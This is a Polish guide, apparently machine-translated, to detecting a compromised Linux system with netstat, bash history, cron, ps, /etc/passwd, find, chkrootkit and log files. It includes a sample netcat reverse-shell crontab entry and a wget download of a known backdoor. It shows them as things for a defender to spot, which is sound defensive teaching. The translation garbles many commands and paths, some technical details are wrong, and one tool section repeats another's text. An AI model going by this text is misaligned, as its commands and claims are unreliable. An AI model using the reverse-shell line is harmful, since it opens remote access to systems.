Jak ustalić, czy system Linux jest zagrożony

Istnieje wiele powodów, dla których haker miałby wkraczać do twojego systemu i spowodować poważne kłopoty. Wiele lat temu może to było pochwalić się swoimi umiejętnościami, ale w dzisiejszych czasach intencje takich działań mogą być znacznie bardziej skomplikowane z znacznie szerszymi konsekwencjami dla ofiary. Może to zabrzmieć oczywisto, ale tylko dlatego, że „wszystko wydaje się w porządku”, nie oznacza to, że wszystko jest w porządku. Hakerzy mogą przeniknąć do twojego systemu bez poinformowania Cię i zarażania go złośliwym oprogramowaniem, aby przejąć pełną kontrolę, a nawet do ruchu bocznego między systemami. Złośliwe oprogramowanie może być ukryte w systemie i służy jako backdoor lub system dowodzenia i kontroli dla hakerów do wykonywania złośliwych czynności w systemie.Lepiej być bezpiecznym niż żałować. Nie możesz od razu zdać sobie sprawy, że twój system został zhakowany, ale istnieją pewne sposoby ustalenia, czy Twój system jest zagrożony. W tym artykule omówione, jak ustalić, czy twój Linux System został naruszony przez osobę nieautoryzowaną lub bot loguje się do twojego systemu, aby wykonywać złośliwe działania.

Netstat

NetStat jest ważnym narzędziem sieci TCP/IP, które zapewnia informacje i statystyki dotyczące protokołów w użyciu i aktywnych połączeniach sieciowych.

Użyjemy Netstat Na przykładowym komputerze ofiary, aby sprawdzić coś podejrzanego w aktywnych połączeniach sieciowych za pośrednictwem następującego polecenia:

Ubuntu@ubuntu: ~ $ netstat -antp

Tutaj zobaczymy wszystkie aktualnie aktywne połączenia. Teraz będziemy szukać połączenie, które nie powinno tam być.

Oto aktywne połączenie w porcie 44999 (port, który nie powinien być otwarty).Widzimy inne szczegóły dotyczące połączenia, takie jak Pid, i nazwa programu, którą działa w ostatniej kolumnie. W tym przypadku Pid Jest 1555 a złośliwy ładunek, którym działa ./powłoka.elf plik.

Kolejne polecenie do sprawdzania portów obecnie słuchających i aktywnych w systemie jest następujące:

Ubuntu@ubuntu: ~ $ netstat -la

To dość niechlujne wyjście. Aby odfiltrować połączenia słuchowe i ustalone, użyjemy następującego polecenia:

Ubuntu@ubuntu: ~ $ netstat -la | Grep „Słuchaj” „Ustanowiony”

To da ci tylko wyniki, które mają znaczenie, abyś mógł łatwiej sortować te wyniki. Możemy zobaczyć aktywne połączenie Port 44999 W powyższych wynikach.

Po rozpoznaniu złośliwego procesu możesz zabić proces za pomocą następujących poleceń. Zwrócimy uwagę Pid procesu za pomocą polecenia NetStat i zabij proces za pomocą następującego polecenia:

Ubuntu@ubuntu: ~ $ Kill 1555

~.Historia bash

Linux prowadzi rekord, w którym użytkownicy zalogowali się do systemu, od tego, co IP, kiedy i na jak długo.

Możesz uzyskać dostęp do tych informacji za pomocą ostatni Komenda. Wyjście tego polecenia wyglądałoby w następujący sposób:

Ubuntu@ubuntu: ~ $ last

Dane wyjściowe pokazuje nazwę użytkownika w pierwszej kolumnie, terminal w drugim, adres źródłowy w trzecim czasie, czas logowania w czwartej kolumnie i całkowity czas sesji zarejestrowany w ostatniej kolumnie. W takim przypadku użytkownicy Usman I Ubuntu są nadal zalogowane. Jeśli zobaczysz jakąkolwiek sesję, która nie jest autoryzowana lub wygląda złośliwie, zapoznaj się z ostatnią sekcją tego artykułu.

Historia rejestrowania jest przechowywana ~.Historia bash plik. Więc historię można łatwo usunąć, usuwając .Historia bash plik. Ta akcja jest często wykonywana przez atakujących w celu pokrycia ich utworów.

Ubuntu@ubuntu: ~ $ cat .bash_history

To polecenie wyświetli polecenia uruchomione w twoim systemie, a najnowsze polecenie wykonane na dole listy.

Historię można usunąć za pomocą następującego polecenia:

Ubuntu@ubuntu: ~ $ historia -c

To polecenie tylko usunie historię z terminalu, którego obecnie używasz. Istnieje więc bardziej poprawny sposób:

Ubuntu@ubuntu: ~ $ cat/dev/null> ~/.bash_history

To wyjaśni zawartość historii, ale utrzymuje plik na miejscu. Tak więc, jeśli widzisz tylko swój obecny login po uruchomieniu ostatni polecenie, to wcale nie jest dobry znak. Wskazuje to, że twój system mógł zostać zagrożony i że atakujący prawdopodobnie usunęł historię.

Jeśli podejrzewasz złośliwego użytkownika lub IP, zaloguj się jako ten użytkownik i uruchom polecenie historia, następująco:

Ubuntu@ubuntu: ~ $ su
Ubuntu@ubuntu: ~ $ historia

To polecenie wyświetli historię poleceń, czytając plik .Historia bash w /dom folder tego użytkownika. Ostrożnie szukaj wget, kędzior, Lub Netcat Polecenia, na wypadek, gdyby atakujący używał tych poleceń do przesyłania plików lub instalacji z narzędzi repo, takich jak kryptowaluty lub boty spamowe.

Spójrz na poniższy przykład:

Powyżej możesz zobaczyć polecenie "wget https: // github.com/sajith/mod-rootme." W tym poleceniu haker próbował uzyskać dostęp do pliku poza repozytorium za pomocą wget Aby pobrać backdoor o nazwie „Mod-Root Me” i zainstaluj go w swoim systemie. To polecenie w historii oznacza, że ​​system jest zagrożony i został wyrzucony przez atakującego.

Pamiętaj, że ten plik może być ręcznie wydalony lub wytworzyć jego substancję. Dane podane przez to polecenie nie mogą być traktowane jako określona rzeczywistość. Jednak w przypadku, gdy atakujący przeprowadził „złe” polecenie i zaniedbał ewakuację historii, będzie tam.

Jobs Cron

Cron Jobs może służyć jako istotne narzędzie po skonfigurowaniu do konfigurowania odwrotnej powłoki na maszynie atakującego. Edycja Jobs Cron jest ważną umiejętnością, podobnie jak wiedza o ich obejrzeniu.

Aby wyświetlić zadania CRON działające dla bieżącego użytkownika, użyjemy następującego polecenia:

Ubuntu@ubuntu: ~ $ crontab -l

Aby wyświetlić zadania CRON działające dla innego użytkownika (w tym przypadku Ubuntu), użyjemy następującego polecenia:

Ubuntu@ubuntu: ~ $ crontab -u ubuntu -l

Aby wyświetlić codzienne, godzinowe, tygodniowe i miesięczne prace CRON, będziemy używać następujących poleceń:

Daily Cron Jobs:

Ubuntu@ubuntu: ~ $ ls -la /etc /cron.codziennie

Godzinowe prace Cron:

Ubuntu@ubuntu: ~ $ ls -la /etc /cron.cogodzinny

Cotygodniowe prace Cron:

Ubuntu@ubuntu: ~ $ ls -la /etc /cron.co tydzień

Brać przykład:

Atakujący może włożyć pracę Cron /etc/crontab To prowadzi złośliwe polecenie 10 minut po minucie. Atakujący może również prowadzić złośliwą usługę lub odwrotną skorupę za pośrednictwem Netcat lub inne narzędzie. Kiedy wykonujesz polecenie $ ~ crontab -l, Zobaczysz pracę CRON, która działa:

Ubuntu@ubuntu: ~ $ crontab -l
Ct = $ (crontab -l)
Ct = $ ct $ '\ n10 * * * * nc -e /bin /bash 192.168.8.131 44999 '
printf „$ ct” | crontab -
PS Aux

Aby właściwie sprawdzić, czy system został zagrożony, ważne jest również, aby przeglądać uruchomione procesy. Są przypadki, w których niektóre nieautoryzowane procesy nie zużywają wystarczającego użytkowania procesora, aby uzyskać na liście szczyt Komenda. Tam będziemy używać Ps polecenie wyświetlania wszystkich obecnie działających procesów.

Ubuntu@ubuntu: ~ $ ps auxf

Pierwsza kolumna pokazuje użytkownika, druga kolumna pokazuje unikalny identyfikator procesu, a użycie procesora i pamięci są pokazane w następnych kolumnach.

Ta tabela dostarczy Ci najwięcej informacji. Powinieneś sprawdzić każdy uruchomiony proces, aby poszukać czegoś osobliwego, aby wiedzieć, czy system jest naruszony, czy nie. W przypadku, gdy znajdziesz coś podejrzanego, Google lub uruchom z lsof polecenie, jak pokazano powyżej. To dobry nawyk do biegania Ps Polecenia na twoim serwerze i zwiększy twoje szanse na znalezienie czegoś podejrzanego lub z codziennej rutyny.

/etc/passwd

/etc/passwd Plik śledzi każdego użytkownika w systemie. Jest to plik oddzielony do okrężnicy zawierający informacje, takie jak nazwa użytkownika, userID, szyfrowane hasło, GroupID (GID), pełna nazwa użytkownika, katalog domowy użytkownika i powłoka logowania.

Jeśli atakujący wbija się do twojego systemu, istnieje możliwość, że stworzy więcej użytkowników, aby utrzymać rzeczy do oddzielania lub stworzyć tylną część w systemie, aby wrócić za pomocą tego tylnego. Podczas sprawdzania, czy system został zagrożony, powinieneś również zweryfikować każdego użytkownika w pliku /etc /passwd. Wpisz następujące polecenie, aby to zrobić:

Ubuntu@ubuntu: ~ $ cat itp./Passwd

To polecenie da ci wyjście podobne do tego poniżej:

Gnome-initial-settup: x: 120: 65534 ::/run/gnome-initial-settup/:/bin/false
GDM: x: 121: 125: GNOME Display Manager:/var/lib/gdm3:/bin/false
Usman: X: 1000: 1000: Usman:/Home/Usman:/Bin/Bash
Postgres: x: 122: 128: Administrator PostgreSQL ,,,:/var/lib/postgresql:/bin/bash
Debian-Tor: x: 123: 129 ::/var/lib/tor:/bin/false
Ubuntu: x: 1001: 1001: Ubuntu ,,,:/home/ubuntu:/bin/bash
Lightdm: x: 125: 132: Light Display Manager:/var/lib/lightdm:/bin/false
Debian-GDM: x: 124: 131: Gnome Display Manager:/var/lib/gdm3:/bin/false
Anonimowy: x: 1002: 1002: ,,,:/home/anonimowy:/bin/bash

Teraz będziesz chciał szukać każdego użytkownika, którego nie jesteś świadomy. W tym przykładzie możesz zobaczyć użytkownika w pliku o nazwie „Anonimowy.„Kolejną ważną rzeczą, na którą należy zwrócić uwagę, jest to, że jeśli atakujący utworzył użytkownika, aby z powrotem zalogować się, użytkownik będzie miał również przypisaną powłokę„/bin/bash ”. Możesz więc zawęzić swoje wyszukiwanie, GREPPING następujące dane wyjściowe:

Ubuntu@ubuntu: ~ $ cat /etc /passwd | grep -i "/bin/bash"
Usman: X: 1000: 1000: Usman:/Home/Usman:/Bin/Bash
Postgres: x: 122: 128: Administrator PostgreSQL ,,,:/var/lib/postgresql:/bin/bash
Ubuntu: x: 1001: 1001: Ubuntu ,,,:/home/ubuntu:/bin/bash
Anonimowy: x: 1002: 1002: ,,,:/home/anonimowy:/bin/bash

Możesz wykonać dalsze „bash magia”, aby udoskonalić swoje wyjście.

Ubuntu@ubuntu: ~ $ cat /etc /passwd | grep -i "/bin/bash" | CUT -d ":" -f 1
Usman
Postgres
Ubuntu
anonimowy

Znajdować

Wyszukiwania oparte na czasie są przydatne do szybkiego segregacji. Użytkownik może również modyfikować znaczniki czasu zmieniające plik. Aby poprawić niezawodność, uwzględnij CTime w kryteriach, ponieważ jest o wiele trudniej manipulować, ponieważ wymaga modyfikacji niektórych plików poziomowych.

Możesz użyć następującego polecenia, aby znaleźć pliki utworzone i zmodyfikowane w ciągu ostatnich 5 dni:

Ubuntu@ubuntu: ~ $ Find / -mtime -o -ctime -5

Aby znaleźć wszystkie pliki SUID należące do root i sprawdzić, czy na listach znajdują się jakieś nieoczekiwane wpisy, użyjemy następującego polecenia:

Ubuntu@ubuntu: ~ $ Find / -perm -4000 -User root -type f

Aby znaleźć wszystkie pliki SGID (Ustaw identyfikator użytkownika) należące do root i sprawdź, czy na listach znajdują się jakieś nieoczekiwane wpisy, użyjemy następującego polecenia:

Ubuntu@ubuntu: ~ $ Find / -perm -6000 -Type f

Chkrootkit

Rootkits to jedna z najgorszych rzeczy, które mogą się zdarzyć w systemie i są jednym z najniebezpieczniejszych ataków, bardziej niebezpiecznych niż złośliwe oprogramowanie i wirusy, zarówno pod względem uszkodzeń systemu, jak i trudności w ich znalezieniu i wykryciu.

Są one zaprojektowane w taki sposób, że pozostają ukryte i robią złośliwe rzeczy, takie jak kradzież kart kredytowych i informacji o bankowości internetowej. Rootkits Daj cyberprzestępcom możliwość kontrolowania systemu komputerowego. Rootkits pomagają również atakującemu w monitorowaniu klawiszy na klawiszy i wyłączeniu oprogramowania antywirusowego, co ułatwia kradzież prywatnych informacji.

Tego rodzaju złośliwe oprogramowanie mogą pozostać w twoim systemie przez długi czas bez zauważenia użytkownika, i mogą spowodować poważne uszkodzenia. Kiedyś Rootkit jest wykrywany, nie ma innego sposobu, jak tylko ponowić ponowne zainstalowanie całego systemu. Czasami te ataki mogą nawet powodować awarię sprzętu.

Na szczęście istnieją kilka narzędzi, które mogą pomóc w wykryciu Rootkits W systemach Linux, takich jak Lynis, Clam AV lub LMD (wykrywanie złośliwego oprogramowania Linux). Możesz sprawdzić swój system pod kątem znanego Rootkits Korzystanie z poniższych poleceń.

Najpierw zainstaluj Chkrootkit Za pośrednictwem następującego polecenia:

Ubuntu@ubuntu: ~ $ sudo apt instal instaluj chkrootkit

To zainstaluje Chkrootkit narzędzie. Możesz użyć tego narzędzia do sprawdzenia rootkits za pomocą następującego polecenia:

Ubuntu@ubuntu: ~ $ sudo chkrootkit

Pakiet Chkrootkit składa się ze skryptu Shell, który sprawdza systemy systemowe pod kątem modyfikacji rootkit, a także kilku programów, które sprawdzają różne problemy bezpieczeństwa. W powyższej sprawie pakiet sprawdzony pod kątem znaku rootkit w systemie i nie znalazł żadnego. Cóż, to dobry znak!

Dzienniki Linux

Dzienniki Linux dają harmonogram zdarzeń w ramach roboczych i aplikacji Linux i są ważnym instrumentem dochodzeniowym, gdy doświadczasz problemów. Główne zadanie, które administrator musi wykonać, gdy dowiaduje się, że system jest zagrożony.

W przypadku problemów z zastosowaniem w strefie roboczej rekordy dziennika są utrzymywane w kontakcie z różnymi obszarami. Na przykład Chrome komponuje raporty o awarie '~/.Raporty Chrome/Crash '), W przypadku gdy aplikacja obszarze roboczego komponuje dzienniki zależne od inżyniera i pokazuje, czy aplikacja uwzględnia niestandardowe układu dziennika. Zapisy są w/var/log informator. Istnieją dzienniki Linux dla wszystkiego: Framework, porcja, szefowie pakietów, formularze rozruchowe, Xorg, Apache i MySQL. W tym artykule motyw jawnie koncentruje się na dziennikach Linux Framework.

Możesz zmienić się na ten katalog, wykorzystując zamówienie na dyski kompaktowe. Powinieneś mieć uprawnienia do wyświetlania lub zmiany plików dziennika.

Ubuntu@ubuntu: ~ $ cd /var /log

Instrukcje wyświetlania dzienników Linux

Użyj następujących poleceń, aby zobaczyć niezbędne dokumenty LOG.

Dzienniki Linux można zobaczyć za pomocą polecenia CD /var /log, W tym momencie komponując zamówienie, aby zobaczyć, jak logi zostały odłożone w tym katalogu. Jednym z najważniejszych dzienników jest Syslog, który rejestruje wiele ważnych dzienników.

Ubuntu@ubuntu: cat syslog

Aby zdezynfekować wyjście, użyjemy „mniej" Komenda.

Ubuntu@Ubuntu: Cat Syslog | mniej

Wpisz polecenie var/log/syslog zobaczyć sporo rzeczy pod plik syslog. Skoncentrowanie się na konkretnym problemie zajmie trochę czasu, ponieważ ten rekord zwykle będzie długi. Naciśnij Shift+G, aby przewijać w dół w wyniku rekordu, co oznacza „koniec."

Możesz również zobaczyć dzienniki za pomocą DMESG, który drukuje obsługę pierścienia części. Ta funkcja drukuje wszystko i wysyła Cię w miarę możliwości. Od tego momentu możesz skorzystać z zamówienia Dmesg | mniej patrzeć przez wydajność. W przypadku, gdy musisz zobaczyć dzienniki dla danego użytkownika, musisz uruchomić następujące polecenie:

DMESG - obiekt = użytkownik

Podsumowując, możesz użyć zamówienia ogona, aby zobaczyć dokumenty LOG. Jest to niewielkie, ale przydatne narzędzie, którego można użyć, ponieważ służy do pokazania ostatniej części dzienników, w której najprawdopodobniej wystąpił problem. Możesz także określić liczbę ostatnich bajtów lub linii, które można wyświetlić w poleceniu ogona. W tym celu skorzystaj z polecenia ogon/var/log/syslog. Istnieje wiele sposobów spojrzenia na dzienniki.

Dla określonej liczby wierszy (model rozważa ostatnie 5 wierszy), wprowadź następujące polecenie:

Ubuntu@ubuntu: ~ $ tail -f -n 5/var/log/syslog

To wydrukuje najnowsze 5 wierszy. Kiedy nadejdzie kolejna linia, poprzednia zostanie ewakuowana. Aby uciec od zamówienia ogona, naciśnij Ctrl+x.

Ważne dzienniki Linuksa

Główne cztery dzienniki Linux obejmują:

1. Dzienniki aplikacji
2. Dzienniki zdarzeń
3. Dzienniki usług
4. Dzienniki systemowe

Ubuntu@Ubuntu: Cat Syslog | mniej

• /var/log/syslog Lub /var/log/wiadomości: Komunikaty ogólne, podobnie jak dane związane z frameworkiem. Ten dziennik przechowuje wszystkie informacje o działaniu w ramach światowych ram.

Ubuntu@Ubuntu: Cat Auth.Log | mniej

• /var/log/auth.dziennik Lub /var/log/bezpieczne: Przechowuj dzienniki weryfikacji, w tym zarówno skuteczne, jak i fizowane logowanie i strategie walidacji. Użycie Debian i Ubuntu /var/log/auth.dziennik Aby przechowywać próby logowania, a Redhat i Centos używają /var/log/bezpiecznie do przechowywania dzienników uwierzytelniania.

Ubuntu@ubuntu: cat boot.Log | mniej

• /var/log/boot.dziennik: zawiera informacje o uruchamianiu i wiadomościach podczas uruchamiania.

Ubuntu@Ubuntu: Cat Maillog | mniej

• /var/log/maillog Lub /var/log/poczta.dziennik: przechowuje wszystkie dzienniki zidentyfikowane z serwerami pocztowymi; Cenne, gdy potrzebujesz danych o postfix, SMTPD lub dowolnej administracji związanej z e-mailami działającymi na serwerze.

Ubuntu@Ubuntu: Cat Kern | mniej

• /var/log/kern: zawiera informacje o dziennikach jądra. Ten dziennik jest ważny dla badań niestandardowych części.

Ubuntu@Ubuntu: Cat Dmesg | mniej

• /var/log/dmesg: zawiera wiadomości identyfikujące sterowniki gadżetów. Zamów Dmesg można wykorzystać do zobaczenia wiadomości w tym rekordzie.

Ubuntu@Ubuntu: Cat Faillog | mniej

• /var/log/faillog: Zawiera dane dotyczące wszystkich wymyślonych prób logowania, cenne do zbierania fragmentów wiedzy na temat prób bezpieczeństwa; Na przykład osoby starające się zhakować certyfikaty logowania, podobnie jak napaści mocy zwierząt.

Ubuntu@Ubuntu: Cat Cron | mniej

• /var/log/cron: przechowuje wszystkie wiadomości związane z Cron; Na przykład zatrudnienia Cron lub kiedy demon Cron rozpoczął powołanie, powiązane wiadomości rozczarowania i tak dalej.

Ubuntu@ubuntu: cat yum.Log | mniej

• /var/log/yum.dziennik: W przypadku możliwości wprowadzenia pakietów wykorzystujących zamówienie Yum, ten dziennik przechowuje wszystkie powiązane dane, które mogą być pomocne w podejmowaniu decyzji, czy pakiet i wszystkie segmenty zostały skutecznie wprowadzone.

Ubuntu@Ubuntu: Cat httpd | mniej

• /var/log/httpd/lub/var/log/apache2: Te dwa katalogi służą do przechowywania wszystkich rodzajów dzienników dla serwera Apache HTTP, w tym dzienników dostępu i dzienników błędów. Plik ERROR_LOG zawiera wszystkie złe żądania otrzymane przez serwer HTTP. Te błędy obejmują problemy z pamięcią i inne błędy związane z ramami. Access_log zawiera zapis wszystkich zabiegów otrzymanych za pośrednictwem HTTP.

Ubuntu@ubuntu: cat mysqld.Log | mniej

• /var/log/mysqld.dziennik Lub/var/log/mysql.dziennik : dokument dziennika mysql, który rejestruje wszystkie wiadomości o awarii, debugowania i sukcesie. Jest to kolejne zdarzenie, w którym ramy kieruje się do rejestru; Redhat, Centos, Fedora i inne frameworki oparte na Redhat Użyj/var/log/mysqld.Log, podczas gdy Debian/Ubuntu używa/var/log/mysql.Katalog dziennika.

Narzędzia do przeglądania dzienników Linux

Obecnie dostępnych jest wiele urządzeń do śledzenia dzienników typu open source, dzięki czemu wybieranie odpowiednich zasobów dzienników akcji. Bezpłatne i open source Checkery mogą działać na dowolnym systemie, aby wykonać zadanie. Oto pięć najlepszych, jakie korzystałem w przeszłości, w żadnej konkretnej kolejności.

• Graylog

Rozpoczęty w Niemczech w 2011 roku, Graylog jest obecnie oferowany jako urządzenie open source lub porozumienie biznesowe. Graylog ma być sprowadzonym, log-log-tabelg, który odbiera strumienie informacji z różnych serwerów lub punktów końcowych i pozwala szybko przeglądać lub rozbić te dane.

Graylog zgromadził pozytywną rozgłos wśród głowic szkieletowych w wyniku swojej prostoty i wszechstronności. Większość przedsięwzięć internetowych zaczyna się niewiele, ale może się rozwijać wykładniczo. Graylog może regulować stosy nad systemem serwerów zaplecza i codziennie obsługiwać kilka terabajtów informacji o dzienniku.

Przewodniczący IT zobaczą front interfejsu GrayLog jako prosty w użyciu i energiczny w swojej przydatności. GrayLog działa na ideę pulpitów nawigacyjnych, który pozwala użytkownikom wybrać rodzaj pomiarów lub źródeł informacji, które znajdują ważne i szybko obserwują pochyłości po pewnym czasie.

Kiedy nastąpi odcinek bezpieczeństwa lub wykonania, przewodniczący muszą mieć możliwość śledzenia manifestacji do kierowcy podstawowego, jak można się spodziewać. Funkcja wyszukiwania Grayloga sprawia, że ​​to zadanie jest proste. To narzędzie działało w adaptacji do awarii wewnętrznej, która może uruchomić wielokrotne przedsięwzięcia, abyś mógł razem rozbić kilka potencjalnych zagrożeń.

• Nagios

Rozpoczęty przez jednego dewelopera w 1999 r. Obecna interpretacja Nagios można zaimplementować na serwerach z dowolnym systemem operacyjnym (Linux, Windows itp.).

Podstawowym elementem Nagios jest serwer dziennika, który usprawnia asortyment informacyjny i udostępnia dane stopniowo dla dyrektorów Framework. Silnik serwera dziennika Nagios złapie informacje stopniowo i przekazuje je przełomowym instrumentem wyszukiwania. Włączenie do innego punktu końcowego lub aplikacji jest prostą gratyfikacją dla tego nieodłącznego kreatora układu.

Nagios jest często wykorzystywany w stowarzyszeniach, które muszą sprawdzić bezpieczeństwo swoich dzielnic i mogą przeglądać zakres okazji związanych z systemem, aby pomóc w robotyce przenoszenia przestrzeni. Nagios można zaprogramować do wykonywania określonych zadań, gdy spełniony jest określony warunek, co pozwala użytkownikom wykrywać problemy nawet przed uwzględnieniem potrzeb człowieka.

Jako główny aspekt oceny systemu, Nagios będzie kierować informacje logarytmiczne zależne od obszaru geograficznego, w którym się uruchamia. Kompletne pulpity nawigacyjne z mapowaniem innowacji można wdrożyć, aby zobaczyć transmisję ruchu internetowego.

• Logalize

Logalize produkuje narzędzia open source dla dyrektorów framework lub administrantów i specjalistów ds. Bezpieczeństwa, aby pomóc im w nadzorowaniu dzienników serwerów i pozwalają im skupić się na przekształceniu dzienników w cenne informacje. Podstawowym elementem tego narzędzia jest to, że jest on dostępny jako bezpłatne pobieranie do użytku domowego lub biznesowego.

Podstawowym elementem Nagios jest serwer dziennika, który usprawnia asortyment informacyjny i udostępnia dane stopniowo dla dyrektorów Framework. Silnik serwera dziennika Nagios złapie informacje stopniowo i przekazuje je przełomowym instrumentem wyszukiwania. Włączenie do innego punktu końcowego lub aplikacji jest prostą gratyfikacją dla tego nieodłącznego kreatora układu.

Nagios jest często wykorzystywany w stowarzyszeniach, które muszą sprawdzić bezpieczeństwo swoich dzielnic i mogą przeglądać zakres okazji związanych z systemem, aby pomóc w robotyce przenoszenia przestrzeni. Nagios można zaprogramować do wykonywania określonych zadań, gdy spełniony jest określony warunek, co pozwala użytkownikom wykrywać problemy nawet przed uwzględnieniem potrzeb człowieka.

Jako główny aspekt oceny systemu, Nagios będzie kierować informacje logarytmiczne zależne od obszaru geograficznego, w którym się uruchamia. Kompletne pulpity nawigacyjne z mapowaniem innowacji można wdrożyć, aby zobaczyć transmisję ruchu internetowego.

Co powinieneś zrobić, jeśli zostałeś naruszony?

Najważniejsze jest nie panika, szczególnie jeśli osoba nieautoryzowana jest teraz podpisana. Powinieneś mieć opcję odzyskania kontroli nad maszyną, zanim druga osoba wie, że o nich wiesz. W przypadku, gdy wiedzą, że jesteś świadomy ich obecności, atakujący może trzymać cię z dala od serwera i zacząć niszczyć system. Jeśli nie jesteś taki techniczny, wszystko, co musisz zrobić, to natychmiast wyłączyć cały serwer. Możesz zamknąć serwer za pomocą następujących poleceń:

Ubuntu@ubuntu: ~ $ shutdown -h teraz

Lub

Ubuntu@ubuntu: ~ $ Systemctl Poweroff

Innym sposobem na to jest logowanie się do panelu sterowania dostawcy hostingu i wyłączenie go stamtąd. Po wyłączeniu serwera możesz pracować nad potrzebnymi zasadami zapory i skonsultować się z każdym, aby uzyskać pomoc w swoim czasie.

Jeśli czujesz się bardziej pewny siebie, a twój dostawca hostingowy ma upręczną zaporę ogniową, a następnie tworzyć i umożliwić dwie reguły:

• Zezwalaj na ruch SSH tylko z adresu IP.
• Zablokuj wszystko inne, nie tylko SSH, ale każdy protokół działający na każdym porcie.

Aby sprawdzić aktywne sesje SSH, użyj następującego polecenia:

Ubuntu@ubuntu: ~ $ ss | Grep Ssh

Użyj następującego polecenia, aby zabić ich sesję SSH:

Ubuntu@ubuntu: ~ $ zabój

To zabije ich sesję SSH i zapewni dostęp do serwera. W przypadku, gdy nie masz dostępu do zapory upstream, będziesz musiał utworzyć i włączyć reguły zapory na samym serwerze. Następnie, kiedy ustawione są reguły zapory, zabij nieautoryzowaną sesję SSH użytkownika za pomocą polecenia „Kill”.

Ostatnia technika, jeśli jest dostępna, zaloguj się na serwer za pomocą połączenia poza pasmem, taką jak konsola szeregowa. Zatrzymaj wszystkie sieci za pośrednictwem następującego polecenia:

Ubuntu@ubuntu: ~ $ Systemctl Stop Network.praca

To w pełni zatrzyma dowolny system do ciebie, więc byłbyś teraz w stanie włączyć sterowanie zaporą w swoim czasie.

Po odzyskaniu kontroli nad serwerem nie ufaj mu łatwo. Nie próbuj naprawić i ponownie ich używać. To, co jest zepsute. Nigdy nie wiedziałbyś, co może zrobić atakujący, więc nigdy nie powinieneś być pewien, że serwer jest bezpieczny. Tak więc ponowna instalacja powinna być twoim ostatnim krokiem.